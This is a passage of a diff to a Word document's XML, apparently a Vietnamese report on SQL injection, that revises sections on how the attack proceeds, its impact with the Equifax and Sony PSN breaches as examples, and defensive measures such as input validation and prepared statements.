             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:color w:val="000000"/>
@@ -17262,18 +17449,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>ng 5</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+        <w:t xml:space="preserve">ng 5: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17429,6 +17605,7 @@
             <w:pPr>
               <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                 <w:color w:val="000000"/>
@@ -17594,7 +17771,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Quy trình tấn công SQL Injection</w:t>
       </w:r>
       <w:bookmarkEnd w:id="14"/>
@@ -17687,7 +17863,18 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>ìm kiếm các trang web có form đăng nhập, form tìm kiếm hoặc bất kỳ nơi nào chấp nhận dữ liệu đầu vào của người dùng. Kẻ tấn công có thể tìm kiếm trong mã nguồn của trang để xác định các lệnh POST hoặc GET.</w:t>
+        <w:t xml:space="preserve">ìm kiếm các trang web có form đăng nhập, form tìm kiếm hoặc bất kỳ nơi nào chấp nhận dữ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>liệu đầu vào của người dùng. Kẻ tấn công có thể tìm kiếm trong mã nguồn của trang để xác định các lệnh POST hoặc GET.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18187,19 +18374,17 @@
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc208339084"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>Biện pháp phòng chông tấn công SQL Injection</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Tác động của các cuộc tấn công SQL Injection thành công</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18222,17 +18407,64 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>Để bảo vệ web server khỏi các cuộc tấn công SQL Injection, cần áp dụng các biệ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>n pháp sau:</w:t>
+        <w:t>Việc một cuộc tấn công SQL Injection thành công có thể cho phép tội phạm mạng truy cập thông tin nhạy cảm hoặc cho phép thực hiện các hoạt động trái phép trên database. Cụ thể tội phạm mạng có thể truy cập trái phép vào danh sách người dùng, thông tin nhận dạng các nhân (PII), số thẻ tín dụng và các dữ liệu nhạy cảm khác được lưu trong database.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"XfBsBcEW","properties":{"formattedCitation":"[14]","plainCitation":"[14]","noteIndex":0},"citationItems":[{"id":151,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/4Y4SUFZT"],"itemData":{"id":151,"type":"webpage","abstract":"Read this practical technical guide about the 5 most common SQL injection attacks and how to prevent them. It packs real-life examples, mitigation steps &amp; more!","container-title":"Pentest-Tools.com","language":"vi","title":"Breaking down the 5 most common SQL injection attacks","URL":"https://pentest-tools.com/blog/sql-injection-attacks","accessed":{"date-parts":[["2025",10,4]]},"issued":{"date-parts":[["2024",4,29]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[14]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18256,60 +18488,141 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Trước hết cần </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>k</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>iểm tra và lọc dữ liệu đầu vào (I</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">nput Validation &amp; Sanitization) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>vì đ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>ây là biện pháp cơ bản và quan trọng nhất. Lập trình viên phải kiểm tra chặt chẽ các biến hoặc dữ liệu đầu vào, đặc biệt là các form nhập liệu trên trang web. Các ký tự đặc biệt mà hacker thường dùng cần được lọc hoặc từ chối.</w:t>
+        <w:t>Một vài study case làm ví dụ có thể nhắc đến như vụ vi phạm dữ liệu Equifax (2017). Ở đó, t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>in tặc đã khai thác lỗ hổng SQL injection trong hệ thống của công ty, xâm phạm hồ sơ cá nhân của 143 triệu người dùng . Vụ xâm phạm này đã tiết lộ dữ liệu nhạy cảm như số an sinh xã hội, ngày sinh, địa chỉ hoặc thông tin thẻ tín dụng, làm lung lay niềm tin vào tính bảo mật của công ty.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="374151"/>
+          <w:spacing w:val="-6"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F4F8FD"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Chúng có thể thay đổi hoặc xóa dữ liệu trong cơ sở dữ liệu, dẫn đến mất dữ liệu đáng kể hoặc khiến hệ thống không hoạt động.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Cuộc tấn công Sony PlayStation Network (2011) là một ví dụ khác. Trong đó kẻ tấn công lợi dụng </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lỗ hổng SQL injection, chúng đã xâm nhập thành công vào mạng PlayStation Network của Sony. Khoảng 77 triệu người dùng bị đánh </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>cắp và xóa dữ liệu. Điều này dẫn đến gián đoạn dịch vụ và làm lung lay niềm tin của người dùng.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Hacker </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>có được quyền quản trị hệ thống hoặc cơ sở dữ liệu cơ bản, cho phép họ thực hiện nhiều hành động độc hại hơn hoặc truy cập trái phép vào các khu vực cụ thể của hệ thống.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1224"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="288" w:lineRule="auto"/>
+        <w:contextualSpacing/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Biện pháp </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>pháp phòng chông tấn công SQL Injection</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18333,81 +18646,17 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Bên cạnh đó ta có thể </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>á</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>p dụng Prepared Statements (Câu lệnh chuẩn bị</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>đây</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> là phương pháp hiệu quả nhất để ngăn chặn SQL Injection. Thay vì xây dựng câu lệnh SQL bằng cách ghép chuỗi, bạn </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>sử dụng các tham số (placeholder). Điều này giúp tách biệt hoàn toàn mã SQL với dữ liệu đầu vào, ngăn chặn mã độc thự</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>c thi.</w:t>
+        <w:t>Để bảo vệ web server khỏi các cuộc tấn công SQL Injection, cần áp dụng các biệ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>n pháp sau:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18431,80 +18680,60 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ngoài ra ta cần </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>g</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>án quyền thích hợp cho ngườ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">i </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>dùng</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> để mỗi t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>ài</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> khoản kết nối đến cơ sở dữ liệu từ ứng dụng web chỉ nên có các quyền tối thiểu cần thiết. Tránh sử dụng tài khoản có quyền quản trị tối cao (sa).</w:t>
+        <w:t xml:space="preserve">Trước hết cần </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>iểm tra và lọc dữ liệu đầu vào (I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nput Validation &amp; Sanitization) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>vì đ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ây là biện pháp cơ bản và quan trọng nhất. Lập trình viên phải kiểm tra chặt chẽ các biến hoặc dữ liệu đầu vào, đặc biệt là các form nhập liệu trên trang web. Các ký tự đặc biệt mà hacker thường dùng cần được lọc hoặc từ chối.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18528,90 +18757,67 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">Hơn thê nữa </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>h</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>ạn chế thông báo lỗi chi tiế</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">t </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>là việc cần cân nhắc vì việc t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>hông nên hiển thị các thông báo lỗi cơ sở dữ liệu một cách trực tiếp cho ngườ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>i dùng</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> có thể tiết lộ cấu trúc của cơ sở dữ liệu và cung cấp thông tin hữu ích cho kẻ tấ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>n công.</w:t>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>hực hiện việ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">c này theo hai cách một là </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
